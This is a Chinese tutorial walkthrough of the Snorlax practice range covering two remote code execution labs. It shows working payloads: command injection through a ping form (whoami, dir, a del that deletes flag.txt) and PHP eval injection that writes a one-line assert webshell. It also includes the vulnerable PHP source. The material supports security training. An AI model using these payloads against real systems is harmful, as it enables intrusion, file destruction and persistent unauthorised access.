Snorlax 靶场：RCE 攻击

目录

• RCE 攻击
• RCE Exec
  • 漏洞利用
  • 查看源码
• RCE Eval
  • 漏洞利用
  • 查看源码

RCE 攻击#

命令注入攻击的目的是，在易受攻击的应用程序中注入和执行攻击者指定的命令。在这种情况下，执行不需要的系统命令的应用程序就像一个伪系统外壳，攻击者可以将其作为任何授权的系统用户使用。但是，执行命令的权限和环境与 web 服务相同。
在大多数情况下，由于缺少正确的输入数据验证，攻击者对例如表单、cookies、HTTP 标头等进行操控，使得命令注入攻击成为可能。此攻击也称为“远程命令执行 (RCE)”。

Snorlax 靶场共有 2 个关于 RCE 的场景，分别是 RCE Exec 和 RCE Eval。

RCE Exec#

漏洞利用#

先熟悉一下页面功能，输入一个 IP 地址后将执行 ping 命令，将结果会显到界面上。

Copy Highlighter-hljs
127.0.0.1

由于在操作系统中，“&”、“&&”、“|”、“||”都可以作为命令连接符使用，只要网页没有对参数进行任何过滤，就可以用连接符后面接上其他指令来执行。使用 & 连接命令“whoami”，该命令用于查看当前有效用户名的命令，Windows 和 Linux 系统都支持。根据显示的内容不同，可以用来判断是否有远程命令执行漏洞和判断操作系统。

Copy Highlighter-hljs
127.0.0.1 & whoami

通过回显的信息可以判断此处存在 RCE，而且操作系统是 Windows。所以接下来可以继续用 RCE 执行 Windows 系统的命令，例如使用 dir 命令扫描目录。

Copy Highlighter-hljs
127.0.0.1 & dir

由于可以使用一些命令来获取操作系统中的文件信息，所以也可以使用 del 删除文件。

Copy Highlighter-hljs
127.0.0.1 & del flag.txt

虽然页面没有什么异常，但是 del 命令已经执行成功了，使用 dir 命令查看已经没有这个文件了。

查看源码#

此处的源码很简单，首先先用 GET 方法接收传来的 IP 地址。接着判断一下操作系统是 Windows 还是 Linux，用于具体写出 ping 命令。PHP 的 shell_exec() 函数通过 shell 环境执行命令，并且将完整的输出以字符串的方式返回。可以明显地看到此处没有对传入的参数进行任何的检验和过滤，导致了 RCE 的存在。

Copy Highlighter-hljs
$ip = $_GET['ip'];

if (stristr(php_uname('s'), 'windows NT')){
    $result = shell_exec('ping '.$ip);
} else{
    $result = shell_exec('ping -c 4 '.$ip);
}

RCE Eval#

漏洞利用#

后台把用户的输入作为代码的一部分执行时也会造成 RCE，可以用 phpinfo() 函数进行测试，它可以提供关于系统中安装的 php 版本和 php 配置的详细信息。

Copy Highlighter-hljs
phpinfo();

因为可以执行用户输入的 PHP 代码，可以使用 PHP 文件读写来写入一句话木马。

Copy Highlighter-hljs
fputs(fopen('shell.php','w'),'<?php assert($_POST[flag]);?>');

虽然表面上看没有什么信息，但是一句话木马已经被写进去了，使用蚁剑连接成功。

查看源码#

源码也很简单，先用 GET 方法接收传来的 string 参数，然后使用 eval() 函数来执行。

Copy Highlighter-hljs
$str = $_GET['string'];

$eval = eval($str.';');
if(!$eval){
    $html = "要不~，随便输一个命令~";
}